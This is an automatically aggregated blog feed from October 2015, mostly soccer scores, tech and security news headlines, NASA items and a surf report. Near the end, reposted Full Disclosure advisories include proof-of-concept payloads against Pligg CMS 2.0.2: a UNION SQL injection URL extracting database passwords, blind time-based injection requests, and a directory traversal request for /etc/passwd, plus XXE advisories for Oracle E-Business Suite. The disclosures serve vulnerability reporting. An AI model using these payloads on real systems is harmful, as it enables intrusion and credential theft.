Latest YouTube Video

Saturday, October 31, 2015

Olympiakos beats Veria 2-0, keeps perfect record

ATHENS, Greece (AP) Olympiakos beat host Veria 2-0 Saturday to maintain its perfect record in the Greek league after nine rounds.

from FOX Sports Digital http://ift.tt/1iuGo3W
via IFTTT

Real Madrid encaja sin Navas, pero gana 3-1 a Las Palmas

BARCELONA, Espana (AP) Sin el costarricense Keylor Navas en el arco por lesion, el Real Madrid permitio el sabado su primer gol en contra de local en la liga espanola, pero gano pese a las numerosas bajas por 3-1 al recien ascendido Las Palmas para mantenerse como unico equipo invicto y seguir una fecha mas en la cima de la clasificacion.

from FOX Sports Digital http://ift.tt/1Wq5zCi
via IFTTT

Sydney FC tops A-League as Newcastle, Brisbane win again

SYDNEY (AP) Sydney FC beat Central Coast 3-1 to top Australian football's A-League, moving ahead of two unlikely pursuers in Newcastle and Brisbane who were also convincing winners in the weekend's fourth round.

from FOX Sports Digital http://ift.tt/1MoU4p5
via IFTTT

Saint-Etienne beats Reims 3-0 to move up to 3rd place

PARIS (AP) Saint-Etienne beat Reims 3-0 at home to move provisionally up to third place in the French league on Saturday, with all the goals coming in the second half.

from FOX Sports Digital http://ift.tt/1M34OtY
via IFTTT

Arsenal beats Swansea 3-0 in Premier League

SWANSEA, Wales (AP) Mesut Ozil set up two goals as Arsenal used a second-half barrage to beat Swansea 3-0 Saturday in the Premier League.

from FOX Sports Digital http://ift.tt/1GS5F3J
via IFTTT

Vardy scores in 8th straight Premier League game

BIRMINGHAM, England (AP) Leicester scored three goals in 20 minutes to beat West Bromwich Albion 3-2 Saturday, with England striker Jamie Vardy netting in his eighth straight Premier League game.

from FOX Sports Digital http://ift.tt/1LIRI7f
via IFTTT

Stoke holds Newcastle to 0-0 draw in Premier League

NEWCASTLE, England (AP) Goalkeeper Jack Butland made several second-half saves to help Stoke earn a 0-0 draw at Newcastle on Saturday in the Premier League.

from FOX Sports Digital http://ift.tt/1N28coX
via IFTTT

Chelsea loses again, City and Arsenal top the Premier League

LONDON (AP) Chelsea's slump in form under Jose Mourinho reached a new low on Saturday after a 3-1 loss at home to Liverpool, while Arsenal and Manchester City continued to set the pace at the summit of the Premier League.

from FOX Sports Digital http://ift.tt/1N27ec7
via IFTTT

Ighalo scores twice as Watford beats West Ham 2-0

LONDON (AP) Odion Ighalo scored twice to guide Watford to a 2-0 victory against West Ham on Saturday in the Premier League at Vicarage Road.

from FOX Sports Digital http://ift.tt/1N257oS
via IFTTT

Real Madrid beats Las Palmas 3-1, stays atop Spanish league

MADRID (AP) Cristiano Ronaldo scored his 13th goal of the season as Real Madrid defeated Las Palmas 3-1 Saturday to remain atop the Spanish league standings.

from FOX Sports Digital http://ift.tt/1MoGSjS
via IFTTT

Dortmund wins 3-1 in Bremen, cuts Bayern's Bundesliga lead

FRANKFURT, Germany (AP) Henrikh Mkhitaryan scored one goal and set up two despite being hit by an object thrown from the stands before the match to help Borussia Dortmund win 3-1 at Werder Bremen in the Bundesliga on Saturday.

from FOX Sports Digital http://ift.tt/1MoGRfL
via IFTTT

CSKA extends lead in Russia as Zenit fails to win

MOSCOW (AP) CSKA Moscow extended its unbeaten start to the Russian Premier League season to 15 games with a 2-0 home win over FC Ufa on Saturday, while reigning champion Zenit St. Petersburg missed out on a chance to snatch second place.

from FOX Sports Digital http://ift.tt/1M7KATe
via IFTTT

Hacking Team Offering Encryption Cracking Tools to Law Enforcement Agencies

Hacking Team, the infamous Italy-based spyware company that had more than 400 GB of its confidential information stolen earlier this year, has resumed its operations and started pitching new hacking tools to help US law enforcement gets around their encryption issues. Yes, Hacking Team is back with a new set of Encryption Cracking Tools for government agencies as well as other customers to


from The Hacker News http://ift.tt/1HishoT
via IFTTT

Free Ransomware Decryption Tool — CoinVault and Bitcryptor

Have you been infected with the insidious CoinVault or Bitcryptor ransomware? If so, there is some potentially good news for you. You may now recover your encrypted files for FREE! – Thanks to the efforts of Dutch police and antivirus maker Kaspersky Lab. Security researchers from Kaspersky Lab and the Dutch Public Prosecution Service have obtained and published the last set of


from The Hacker News http://ift.tt/1MyKAOf
via IFTTT

The Witch Head Nebula


Double, double toil and trouble; Fire burn, and cauldron bubble .... maybe Macbeth should have consulted the Witch Head Nebula. A frighteningly shaped reflection nebula, this cosmic crone is about 800 light-years away though. Its malevolent visage seems to glare toward nearby bright star Rigel in Orion, just off the right edge of this frame. More formally known as IC 2118, the interstellar cloud of dust and gas is nearly 70 light-years across, its dust grains reflecting Rigel's starlight. In this composite portrait, the nebula's color is caused not only by the star's intense bluish light but because the dust grains scatter blue light more efficiently than red. The same physical process causes Earth's daytime sky to appear blue, although the scatterers in planet Earth's atmosphere are molecules of nitrogen and oxygen. via NASA http://ift.tt/1WnLsog

The anonymous Doge

Tinkercad user The anonymous Doge. I love chewing bones! My names not going to be told, and i make phone and tablet cases at request. The price ...

from Google Alert - anonymous http://ift.tt/1NHi0at
via IFTTT

Antarctic Mass Change from GRACE derived Gravity Observations: Jan 2004 - Jun 2014

GRACE, NASA's Gravity Recovery and Climate Experiment, consists of twin co-orbiting satellites that fly in a near polar orbit separated by a distance of 220 km. GRACE precisely measures the distance between the two spacecraft in order to make detailed measurements of the Earth's gravitational field. Since its launch in 2002, GRACE has provided a continuous record of changes in the mass of the Earth's ice sheets. These animations show the change in the mass of the Antarctic Ice Sheet between January 2004 and June 2014 as measured by the pair of GRACE satellites. The 1-arc-deg NASA GSFC mascon solution data was resampled to a 5130 x 5130 data array using Kriging interpolation. A color scale was applied where blue values indicate an increase in the ice sheet mass while red shades indicate a decrease. In addition, a graph overlay shows the running total of the accumulated mass change in gigatons. Four separate animations are shown here: one of the full Antarctic Ice Sheet (above) and three of individual regional views (below) showing the regions of West Antarctica, the Antarctic Peninsula and East Antarctica. The time-series of each region is shown with a graph depicting the ice loss for the region alone. Note that the range on the color scale is different for each regional view in order to portray the most detail possible. Areas outside the region being shown are colored in a pale green to indicate that it is not included in the view. The floating ice shelves, shown in a lighter shade of green, are also not included. Technical Note: The glacial isostatic adjustment signal (Earth mass redistribution in response to historical ice loading) has been removed using the ICE-6G model (Peltier et al. 2015).

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1M20sDi
via IFTTT

Friday, October 30, 2015

Marketing firm implicated in FIFA scandal sells soccer team

CARY, N.C. (AP) A sports marketing firm implicated in an investigation into corruption in world soccer has sold its North American Soccer League team.

from FOX Sports Digital http://ift.tt/1REerTe
via IFTTT

Bayern's 10-game winning start to Bundesliga comes to an end

BERLIN (AP) Eintracht Frankfurt ended Bayern Munich's record 10-game winning start to the Bundesliga by holding the German league leader 0-0 on Friday.

from FOX Sports Digital http://ift.tt/1NGB20I
via IFTTT

Deportivo draws with Atletico Madrid in Spain

MADRID (AP) Atletico Madrid squandered a chance to provisionally go top of the Spanish league when poor defending allowed Deportivo La Coruna to draw 1-1 Friday in the 10th round.

from FOX Sports Digital http://ift.tt/1GPXEw9
via IFTTT

Di Maria scores as French leader PSG wins 1-0 at Rennes

PARIS (AP) Angel Di Maria struck the winner as French league leader Paris Saint-Germain won 1-0 at Rennes on Friday to maintain its unbeaten start to the season.

from FOX Sports Digital http://ift.tt/1GPXCEy
via IFTTT

Bayern's 10-game winning start to Bundesliga ends

BERLIN (AP) Eintracht Frankfurt ended Bayern Munich's record 10-game winning start to the Bundesliga by holding the German league leader to a 0-0 draw on Friday.

from FOX Sports Digital http://ift.tt/1GPVAEy
via IFTTT

Ravens: S Matt Elam, a 2013 1st-round pick, has been suspended 1 game for violating NFL's substance abuse policy (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Chelsea lawyers will defend Brazil's Piazon

RIO DE JANEIRO (AP) Two lawyers from English Premier League champion Chelsea will defend soccer player Lucas Piazon from sexual assault charges he's facing in Canada.

from FOX Sports Digital http://ift.tt/1Oe5d2n
via IFTTT

Ravens: WR Steve Smith (knee) officially listed as probable for Sunday's game vs. Chargers (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

sindresorhus/ava

sindresorhus changed the title from Don't show title when there only one anonymous test to Don't show title when there's only one anonymous test 15 ...

from Google Alert - anonymous http://ift.tt/1Q03b5g
via IFTTT

CryptoWall Ransomware raised $325 Million in Revenue for Its Developer

The Creators of the notorious CryptoWall ransomware virus have managed to raise more than $325 million (£212 million) in this past year alone. Ransomware has emerged as one of the biggest cyber threats to web users in recent times. Typically, hackers primarily gain access to a user's computer system using a ransomware malware, which encrypts all files with a strong cryptographic


from The Hacker News http://ift.tt/1NFTM0p
via IFTTT

TalkTalk Hack: Police Arrest Second Teenager in London

British Police have arrested a second teenage boy in relation to the major hack on the servers of UK-based telco 'TalkTalk' last week. On Monday, a 15-year-old boy (first arrest) from County Antrim, Northern Ireland, was arrested in connection with the TalkTalk Data Breach. <!-- adsense --> On Thursday, The Metropolitan Police Cyber Crime Unit (MPCCU) arrested this second unnamed


from The Hacker News http://ift.tt/1MmIUkH
via IFTTT

Feature-Based Diversity Optimization for Problem Instance Classification. (arXiv:1510.08568v1 [cs.NE])

Understanding the behaviour of heuristic search methods is a challenge. This even holds for simple local search methods such as 2-OPT for the Traveling Salesperson problem. In this paper, we present a general framework that is able to construct a diverse set of instances that are hard or easy for a given search heuristic. Such a diverse set is obtained by using an evolutionary algorithm for constructing hard or easy instances that are diverse with respect to different features of the underlying problem. Examining the constructed instance sets, we show that many combinations of two or three features give a good classification of the TSP instances in terms of whether they are hard to be solved by 2-OPT.



from cs.AI updates on arXiv.org http://ift.tt/20exidO
via IFTTT

Swiss bank cooperating with US, Swiss probes of FIFA

ZURICH (AP) Credit Suisse says it is helping American and Swiss federal investigations into alleged financial corruption linked to FIFA.

from FOX Sports Digital http://ift.tt/1ipHfCZ
via IFTTT

Blatter casts further doubt on integrity of World Cup votes

LONDON (AP) Sepp Blatter has cast further doubt on the integrity of World Cup votes, blaming Michel Platini for scuppering an agreement to award the 2022 tournament to the United States and suggesting Qatar benefited from collusion.

from FOX Sports Digital http://ift.tt/1NENVIS
via IFTTT

Mission '1 Billion' — Microsoft will Automatically Offer Windows 10 Upgrade

Microsoft wholeheartedly wants you to upgrade your PCs to Windows 10, so much so that the company plans to automatically download its new operating system to Windows 7/8 computers next year. Just two weeks ago, Microsoft accidentally pushed Windows 10 installation to Windows 7 and Windows 8/8.1 users through the Windows Update process, but next year the company will do it on purpose.


from The Hacker News http://ift.tt/1kXYhtK
via IFTTT

Tor Releases Anonymous Instant Messenger. Here's How to Use It

The Tor Project has officially launched the first beta version of Tor Messenger, an open source and Encrypted instant messaging client that works on top of the Tor network. Tor Messenger is designed by keeping both simplicity and privacy in mind. The team claimed that their app encrypts the content of instant messages as well as makes it very difficult for snoopers and eavesdroppers to


from The Hacker News http://ift.tt/20feifl
via IFTTT

Ocean City, MD's surf is Good

October 29, 2015 at 07:00PM, the surf is Good!

Ocean City, MD Summary


Surf: shoulder high to 1 ft overhead
Maximum: 1.836m (6.02ft)
Minimum: 1.224m (4.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE

[FD] Xen VM Escape

Xen XSA-148(http://ift.tt/1Wlm0Q9) is the real VM Escape Vulnerability XSA-148 is public just now and it's a memory management logic vulnerability obviously. The bulletin means that a micious PV DomU could enable PS/RW flag of its PDE to read/write the 2M page. So, if a attacker prepare a page table at the 2M page, he could use the vulnerability to modify the PT. Finally, this vulnerability changes to a arbitrary machine memory read/write vulnerability.

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability

1. ADVISORY INFORMATION Title: Oracle E-Business Suite XXE injection Advisory ID: [ERPSCAN-15-030] Advisory URL: http://ift.tt/1LZDL2x Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-611] Impact: information disclosure, DoS, SSRF, NTLM relay Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-4851 CVSS Information CVSS Base Score: 6.8 / 10 AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) Medium (M) Au : Authentication (Level of authentication needed to exploit) None (N) C : Impact to Confidentiality Partial (P) I : Impact to Integrity Partial (P) A : Impact to Availability Partial (P) 3. VULNERABILITY DESCRIPTION 1) An attacker can read an arbitrary file on a server by sending a correct XML request with a crafted DTD and reading the response from the service. 2) An attacker can perform a DoS attack (for example, XML Entity Expansion). 3) An SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access. 4. VULNERABLE PACKAGES Oracle E-Business Suite 12.1.3 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Install Oracle CPU October 2015 6. AUTHOR Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan) 7. TECHNICAL DESCRIPTION Vulnerable servlet: /OA_HTML/oramipp_lpr 8. REPORT TIMELINE Reported: 17.07.2015 Vendor response: 24.07.2015 Date of Public Advisory: 20.10.2015 9. REFERENCES http://ift.tt/1QLXHJH http://ift.tt/1LZDL2x 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability

1. ADVISORY INFORMATION Title: Oracle E-Business Suite - XXE injection Advisory ID: [ERPSCAN-15-029] Advisory URL: http://ift.tt/1Wju5u4 Date published: 21.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-611] Impact: information disclosure, DoS, SSRF, NTLM relay Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-4849 CVSS Information CVSS Base Score: 6.8 / 10 AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) Medium (M) Au : Authentication (Level of authentication needed to exploit) None (N) C : Impact to Confidentiality Partial (P) I : Impact to Integrity Partial (P) A : Impact to Availability Partial (P) 3. VULNERABILITY DESCRIPTION 1) An attacker can read an arbitrary file on a server by sending a correct XML request with a crafted DTD and reading the response from the service. 2) An attacker can perform a DoS attack (for example, XML Entity Expansion). 3) An SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access. 4. VULNERABLE PACKAGES Oracle E-Business Suite 12.1.3 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Install Oracle CPU October 2015 6. AUTHOR Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan) 7. TECHNICAL DESCRIPTION Vulnerable servlet: /OA_HTML/IspPunchInServlet 8. REPORT TIMELINE Reported: 17.07.2015 Vendor response: 24.07.2015 Date of Public Advisory: 20.10.2015 9. REFERENCES http://ift.tt/1QLXHJH http://ift.tt/1Wju5u4 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability

1. ADVISORY INFORMATION Title: Oracle E-Business Suite XXE injection Advisory ID: [ERPSCAN-15-028] Advisory URL: http://ift.tt/1Wju5u2 Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-611] Impact: information disclosure, DoS, SSRF, NTLM relay Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-4886 CVSS Information CVSS Base Score: 6.4 / 10 AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) Low (L) Au : Authentication (Level of authentication needed to exploit) None (N) C : Impact to Confidentiality Partial (P) I : Impact to Integrity Partial (P) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION 1) An attacker can read an arbitrary file on a server by sending a correct XML request with a crafted DTD and reading the response from the service. 2) An attacker can perform a DoS attack (for example, XML Entity Expansion). 3) An SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access. 4. VULNERABLE PACKAGES Oracle E-Business Suite 12.1.3 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Install Oracle CPU October 2015 6. AUTHOR Nikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan) 7. TECHNICAL DESCRIPTION Vulnerable servlet: /OA_HTML/copxml 8. REPORT TIMELINE Reported: 17.07.2015 Vendor response: 24.07.2015 Date of Public Advisory: 20.10.2015 9. REFERENCES http://ift.tt/1QLXHJH http://ift.tt/1Wju5u2 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

Google is Merging its Chrome OS with Android

Google is planning to merge its Chrome OS with Android operating system and roll out a single operating system by 2017. New Android OS Optimized for Laptops: Yes, a Single Operating system for Mobile devices, desktops, laptops and notebooks, just what Microsoft is offering to its users with Windows 10. <!-- adsense --> Chrome OS is a lightweight operating system based on the Linux


from The Hacker News http://ift.tt/1MYG0TU
via IFTTT

[FD] Pligg CMS 2.0.2: Multiple SQL Injections

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of them does not require any credentials, and allows the direct extraction of data from the database. 3. SQL Injection Description Pligg CMS is vulnerable to SQL injection. It is possible to extract data from all databases that the pligg database user has access to. Credentials are not required. Proof Of Concept http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23 Code /story.php:168 if(isset($_GET['reply']) && !empty($parent_comment_id)){ $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id'])); $main_smarty->assign('parrent_comment_id',$parent_comment_id); } [...] function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){ Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments; //Set comment order to 1 if it's not set in the admin panel if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180); elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder']; if (!isset($CommentOrder)) $CommentOrder = 1; If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";} If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";} If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";} If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";} [...] $comments = $db->get_results("SELECT * FROM " . table_comments . " WHERE (comment_status='published' $status_sql) AND comment_link_id=$link->id AND comment_id = $comment_id ORDER BY " . $CommentOrderBy); 4. Blind SQL Injection (Admin Area) Description There is a blind SQL Injection in the admin area of Pligg CMS. This allows an attacker that gained admin credentials to extract data from the database. The problem exists because the index of the submitted "enabled" POST array is used in a query. The value is escaped - so using quotes in the injection is not possible - but it does not place the value in between quotes. Proof Of Concept POST /pligg-cms-master/admin/admin_users.php HTTP/1.1 frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1 Code // admin/admin_users.php foreach($_POST["enabled"] as $id => $valuea) { $_GET['id'] = $id = $db->escape($id); $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id"); 5. Possibly SQL Injection Description The upload module is vulnerable to Blind SQL Injection via the "comment" as well as "id" parameter. The module seems to be unused at the moment, but if it were to be used in the future, or if an attacker finds a different way to execute it, it would be vulnerable. The requests to trigger the vulnerabilities would be: POST http://localhost/pligg-cms-master/modules/upload/upload.php id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23 POST http://localhost/pligg-cms-master/modules/upload/upload.php id=1&number=1&comment=1 Code ./modules/upload/upload.php: if ($_POST['id']) { $linkres=new Link; $linkres->id = sanitize($_POST['id'], 3); if(!is_numeric($linkres->id)) die("Wrong ID"); if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number"); if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files"); // Remove old file and thumbnails with same number $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'"; The first problem is that $_POST[comment] is never sanitized. The second problem is that $_POST['id'] is first sanitized by removing tags, then it is checked if that result is nummeric, and finally the original POST value is used. Because of this, it is possible to put the injection inside tags to bypass the check. 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://ift.tt/1M4uxWr

Source: Gmail -> IFTTT-> Blogger

[FD] Pligg CMS 2.0.2: Directory Traversal

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: Directory Traversal Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description The editor delivered with Pligg CMS is vulnerable to directory traversal, which gives an attacker that obtained admin credentials the opportunity to view any file stored on the webserver that the webserver user has access to. Please note that admin credentials are required. 3. Proof of Concept POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://ift.tt/1M4uzxo

Source: Gmail -> IFTTT-> Blogger

[FD] Pligg CMS 2.0.2: Code Execution & CSRF

